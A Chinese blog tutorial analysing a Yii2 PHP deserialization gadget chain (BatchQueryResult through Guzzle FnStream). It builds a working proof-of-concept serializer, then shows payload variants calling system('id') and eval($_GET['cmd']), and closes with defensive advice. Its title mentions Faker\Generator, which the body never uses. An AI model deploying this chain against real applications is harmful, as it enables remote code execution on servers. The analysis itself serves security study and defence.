Yii2框架反序列化漏洞利用链(一):妙用Faker\Generator的魔术旅程

原创 已于 2025-03-06 18:16:25 修改 · 1.2k 阅读 · 14 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php #android #开发语言

于 2025-03-06 09:39:14 首次发布

前言

PHP 反序列化漏洞是一种常见且危害严重的安全漏洞,它允许攻击者通过精心构造的序列化数据来执行任意代码。本文将以 Yii2 框架中的 BatchQueryResult 类为例,详细分析一个完整的反序列化漏洞利用链,从漏洞原理到最终的 POC 构建。

漏洞原理概述

PHP 反序列化漏洞发生的基本条件是:

  1. 应用程序接收用户输入的序列化数据并使用 unserialize() 函数还原
  2. 存在可利用的"魔术方法"(如 __destruct__wakeup__toString 等)
  3. 这些魔术方法中包含可被利用的代码路径

当这些条件满足时,攻击者可以构造特定的序列化数据,使反序列化过程触发一系列方法调用,最终达到执行任意代码的目的。

Yii2 BatchQueryResult 类分析

我们首先来分析 Yii2 框架中的 BatchQueryResult 类,它位于 vendor/yiisoft/yii2/db/BatchQueryResult.php

关键属性和方法

namespace yii\db;

class BatchQueryResult extends BaseObject implements \Iterator
{
    private $_dataReader;
    
    // 其他属性...
    
    public function __destruct()
    {
        $this->reset();
    }
    
    public function reset()
    {
        if ($this->_dataReader !== null) {
            $this->_dataReader->close();
        }
        $this->_dataReader = null;
        $this->_batch = null;
        $this->_value = null;
        $this->_key = null;
    }
    
    // 其他方法...
}

从代码中可以看出:

  1. __destruct() 方法在对象被销毁时调用 reset()
  2. reset() 方法检查 $_dataReader 是否为 null,如果不是,则调用其 close() 方法

这里的关键点是:如果我们能控制 $_dataReader 属性指向一个具有 close() 方法的对象,并且该 close() 方法能执行我们想要的代码,就能实现代码执行

利用链分析

寻找合适的利用链

为了利用这个漏洞,我们需要寻找一个具有 close() 方法且能被利用的类。经过研究,我们发现 Guzzle HTTP 库中的 GuzzleHttp\Psr7\FnStream 类非常适合:

namespace GuzzleHttp\Psr7;

use Psr\Http\Message\StreamInterface;

class FnStream implements StreamInterface
{
    private $methods;
    
    private static $slots = ['__toString', 'close', 'detach', 'rewind',
        'getSize', 'tell', 'eof', 'isSeekable', 'seek', 'isWritable', 'write',
        'isReadable', 'read', 'getContents', 'getMetadata'];
    
    public function __construct(array $methods)
    {
        $this->methods = $methods;
    }
    
    public function close()
    {
        return call_user_func($this->_fn_close);
    }
    
    // 其他方法...
}

FnStream 类有以下特点:

  1. 它实现了 close() 方法
  2. close() 方法使用 call_user_func($this->_fn_close) 调用存储在 $_fn_close 属性中的可调用内容
  3. 如果我们能控制 $_fn_close 属性,就能执行任意 PHP 函数

完整的利用链如下:

  1. 创建一个序列化的 BatchQueryResult 对象
  2. 设置其 $_dataReader 属性为 FnStream 对象
  3. 设置 FnStream 对象的 $_fn_close 属性为想要执行的 PHP 函数(如 phpinfo
  4. 当这个序列化对象被反序列化时,最终会调用 call_user_func($this->_fn_close),执行我们指定的函数

POC 构建步骤

接下来我们将一步步构建 POC(概念验证代码):

步骤 1:构建基本框架

<?php
namespace yii\db;

class BatchQueryResult
{
    private $_dataReader;
}

namespace {
    use yii\db\BatchQueryResult;
    echo base64_encode(serialize(new BatchQueryResult()));
}

注意点:命名空间必须正确,必须与原始类的命名空间一致(yii\db)。错误的命名空间将导致反序列化失败或利用链断裂。

步骤 2:添加 FnStream 类

<?php
namespace GuzzleHttp\Psr7;

class FnStream
{
    private $_fn_close;
    
    public function __construct()
    {
        $this->_fn_close = "phpinfo";
    }
}

namespace yii\db;

use GuzzleHttp\Psr7\FnStream;

class BatchQueryResult
{
    private $_dataReader;
    
    public function __construct()
    {
        $this->_dataReader = new FnStream();
    }
}

namespace {
    use yii\db\BatchQueryResult;
    echo base64_encode(serialize(new BatchQueryResult()));
}

注意点

  1. 我们只需要实现漏洞利用所必需的部分,不需要完整复制原始类的所有属性和方法。
  2. FnStream 类中,我们设置 $_fn_close = "phpinfo",这将是最终执行的 PHP 函数。
  3. 确保引入了正确的类:use GuzzleHttp\Psr7\FnStream;

步骤 3:完善 POC

为了便于理解,我们来梳理整个利用链的执行流程:

  1. unserialize() 还原 BatchQueryResult 对象
  2. 对象生命周期结束时,触发 __destruct() 方法
  3. __destruct() 调用 reset()
  4. reset() 检查 $_dataReader 并调用 $_dataReader->close()
  5. 由于 $_dataReaderFnStream 对象,所以实际调用的是 FnStream->close()
  6. FnStream->close() 执行 call_user_func($this->_fn_close)
  7. 最终执行 phpinfo() 函数

最终的 POC 代码如下:

<?php
// 第一部分:定义 FnStream 类
namespace GuzzleHttp\Psr7;

class FnStream
{
    private $_fn_close;
    
    public function __construct()
    {
        // 设置要执行的 PHP 函数,可以替换为其他函数或命令
        $this->_fn_close = "phpinfo";
    }
}

// 第二部分:定义 BatchQueryResult 类
namespace yii\db;

use GuzzleHttp\Psr7\FnStream;

class BatchQueryResult
{
    private $_dataReader;
    
    public function __construct()
    {
        // 将 _dataReader 设置为 FnStream 对象
        $this->_dataReader = new FnStream();
    }
}

// 第三部分:生成序列化数据
namespace {
    use yii\db\BatchQueryResult;
    
    // 创建对象并序列化
    $obj = new BatchQueryResult();
    $serialized = serialize($obj);
    
    // 输出 base64 编码后的序列化数据(便于传输)
    echo base64_encode($serialized);
}

进阶利用

上面的 POC 仅执行 phpinfo() 函数,在实际利用中,我们可以替换为更有实际作用的函数:

// 执行系统命令
$this->_fn_close = function() { system('id'); };

// 或者执行 eval
$this->_fn_close = function() { eval($_GET['cmd']); };

注意点:使用匿名函数时,序列化数据会更复杂,但能实现更灵活的控制。

防御措施

为了防御此类漏洞,可以采取以下措施:

  1. 不要直接反序列化不可信数据:如果必须处理用户提供的序列化数据,使用安全的替代方案如 JSON
  2. 使用 PHP 7.1+ 的 allowed_classes 选项:限制可以被反序列化的类 
    unserialize($data, ['allowed_classes' => false]);
  3. 实施输入验证:验证序列化数据的格式和内容
  4. 更新依赖:确保使用最新版本的框架和库,其中可能已修复已知漏洞

总结

本文详细分析了基于 Yii2 框架 BatchQueryResult 类的反序列化漏洞利用链。通过控制 $_dataReader 属性指向一个 FnStream 对象,并设置其 $_fn_close 属性为任意 PHP 函数,我们可以在对象反序列化时触发任意代码执行。

理解此类漏洞的工作原理对于开发安全的 PHP 应用程序和进行有效的安全测试至关重要。始终记住,不要反序列化不可信的数据,这是防御此类漏洞的最佳方式。

参考资料

恩师小迪
关注
Yii2框架 反序列化漏洞复现(CVE-2020-15148)
snowlyzz的博客
10-25 1958
yii2框架 反序列化漏洞复现
yii2框架 反序列化漏洞复现
Zero_Adam的博客
06-19 1576
前言 跟着feng师傅再学习yii2反序列化漏洞,提高代码审计能力 漏洞出现在yii2.0.38之前的版本中,在2.0.38进行了修复,CVE编号是CVE-2020-15148: Yii 2 (yiisoft/yii2) before version 2.0.38 is vulnerable to remote code execution if the application calls unserialize() on arbitrary user input. This is fixed in
yii2反序列化漏洞总结
unexpectedthing的博客
03-29 5014
文章目录yii2框架 反序列化漏洞复现yii 框架搭建过程CVE-2020-15148复现2子3子4子5子6参考yii2框架 反序列化漏洞复现 yii 框架 Yii个适用于开发 Web2.0 应用程序的高性能PHP 框架Yii个通用的 Web 编程框架,即可以用于开发各种用 PHP 构建的 Web 应用。 因为基于组件的框架结构和设计精巧的缓存支持,它特别适合开发大型应用, 如门户网站、社区、内容管理系统(CMS)、 电子商务项目和 RESTful Web 服务等。 Yii
从某达OA到Yii2框架的cookie反序列化漏洞研究
HUANGXIN9898的博客
10-05 736
自身的个tdAuthcode加解密函数来加密payload**,从而可以绕过些防御检测。某达oa。
[代码审计]yii2 反序列化漏洞分析
Huamang的博客
11-16 3615
前言
Yii2 框架跑脚本时内存泄漏问题分析
weixin_30690833的博客
05-24 312
现象 在跑 edu_ocr_img 表的归档时,每跑几万个数据,都会报次内存耗尽 PHP Fatal error: Allowed memory sizeof 134217728 bytesexhausted (triedtoallocate135168 bytes) 跟踪代码发现,是在插入时以下代码造成的: EduOCRTaskBackup::getDb()->createCom...
Yii2反序列化漏洞复现
SimoSimoSimo的博客
07-12 2353
Yii个通用的 Web 编程框架,即可以用于开发各种用 PHP 构建的 Web 应用。 因为基于组件的框架结构和设计精巧的缓存支持,它特别适合开发大型应用, 如门户网站、社区、内容管理系统(CMS)、 电子商务项目和 RESTful Web 服务等。Yii2 2.0.38 以前的版本中存在反序列化漏洞,CVE编号是CVE-2020-15148到github上下载yii22.0.37版本打开 /config/web.php给17行的cookieValidationKey添加个值,随便什么都行不添加就
yii反序列化漏洞复现及利用
weixin_44576725的博客
04-06 6529
yii反序列化漏洞 Yii框架 Yii个适用于开发 Web2.0 应用程序的高性能PHP 框架Yii个通用的 Web 编程框架,即可以用于开发各种用 PHP 构建的 Web 应用。 因为基于组件的框架结构和设计精巧的缓存支持,它特别适合开发大型应用, 如门户网站、社区、内容管理系统(CMS)、 电子商务项目和 RESTful Web 服务等。 Yii 当前有两个主要版本:1.1 和 2.0。 1.1 版是上代的老版本,现在处于维护状态。 2.0 版是个完全重写的版本,采用了最新的技术和协议
15-PHP代码审计——yii 2.0.37反序列化漏洞
网络安全
06-06 1330
Yii套基于组件、用于开发大型Web应用的高性能PHP框架Yii2 2.0.38 之前的版本存在反序列化漏洞,如果程序内部调用了unserialize() 反序列化时,那么程序就可能存在反序列化漏洞,攻击者可通过构造特定的恶意请求执行任意命令。 影响版本: yii2 v2.0.37版本以下 环境: yii-basic-app-2.0.37.tgz php7.0以上 poc: http://www.yii2.com/web/index.php?r=test/sss&.
YII2框架学习 安全篇(五) 文件上传漏洞
混血王子的博客
06-26 2913
最后节,文件上传漏洞。最近几天搬家,偷了个懒几天没更了,今天继续。 先看看这篇http://www.h3c.com/cn/About_H3C/Company_Publication/IP_Lh/2014/05/Home/Catalog/201408/839582_30008_0.htm 对文件上传漏洞的攻击和防御有个大概的了解。 常见的简单防恶意文件上传的方法就是检验后缀名是否为正常文件的后
[CTFSHOW web267]Yii2 反序列化漏洞(CVE-2020-15148)
Landasika的博客
05-17 1677
目录 [CTFSHOW web267]Yii2 反序列化漏洞(CVE-2020-15148)、什么是YiiYii 是什么YiiYii 最适合做什么?二、漏洞分析三、漏洞pocyii 2.0.37 以前yii 2.0.37 以后四、WEB_267 [CTFSHOW web267]Yii2 反序列化漏洞(CVE-2020-15148) 、什么是Yii 参考官网 https://ww...
yii2框架开发之安全xss、csrf、sql注入、文件上传漏洞攻击
西瓜的博客
02-21 8316
常见的漏洞攻击:1、xss:是跨站脚本攻击    分3类:1、存储型2、反射型3、蠕虫型2、csrf:是跨站请求伪造攻击    分2类:1、get型2、post型3、sql注入4、文件上传xss攻击:xss攻击可以:盗取用户账号、也可以盗取后进行非法转账、还可以篡改系统信息、网站挂马等存储型xss下面我们来看下盗号代码(存储型xss):1、通过在浏览器f12 console中输入:2、docume...
Yii2框架反序列化漏洞利用():通达OA的魔术方法利用之旅
最新发布
qq_63949216的博客
03-06 1120
恩师小迪
yii2反序列化分析
qq_43571759的博客
09-25 957
yii2反序列化漏洞分析 影响范围 Yii2 <2.0.38 环境安装 composer安装比较繁琐https://www.jianshu.com/p/62439169bab9 漏洞分析 首先漏洞出发点在BatchQueryResults.php中,起始点般都是能够自动调用的函数中 也就是__destruct()方法 public function __destruct() { // make sure cursor is closed $this->reset(); } 会
13_框架漏洞
qq_45301512的博客
12-19 814
因为要调试每漏洞需要花费大量的步骤,所以我这里只列出了触发点和触发语句,某些漏洞给出了poc
yii2 反序列化漏洞复现与分析
meteox的博客
11-29 966
环境搭建 漏洞yii2.0.38之前的版本,下载2.0.37basic版本 https://github.com/yiisoft/yii2/releases/tag/2.0.37 修改/config/web文件的值 在当前目录输入php yii serve启动 复现 先构造反序列化的入口 新建个controller <?php namespace app\controllers; class SerController extends \yii\web\Controller {
"Yii框架反序列化RCE利用分析及对比补丁详解
总结下,Yii框架中的反序列化RCE利用个严重的安全漏洞。通过对比补丁和分析利用,我们深入了解了这个漏洞的实现细节。由于漏洞的严重性,建议用户尽快更新到修复版本,以保护其Web应用程序的安全。 补充...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值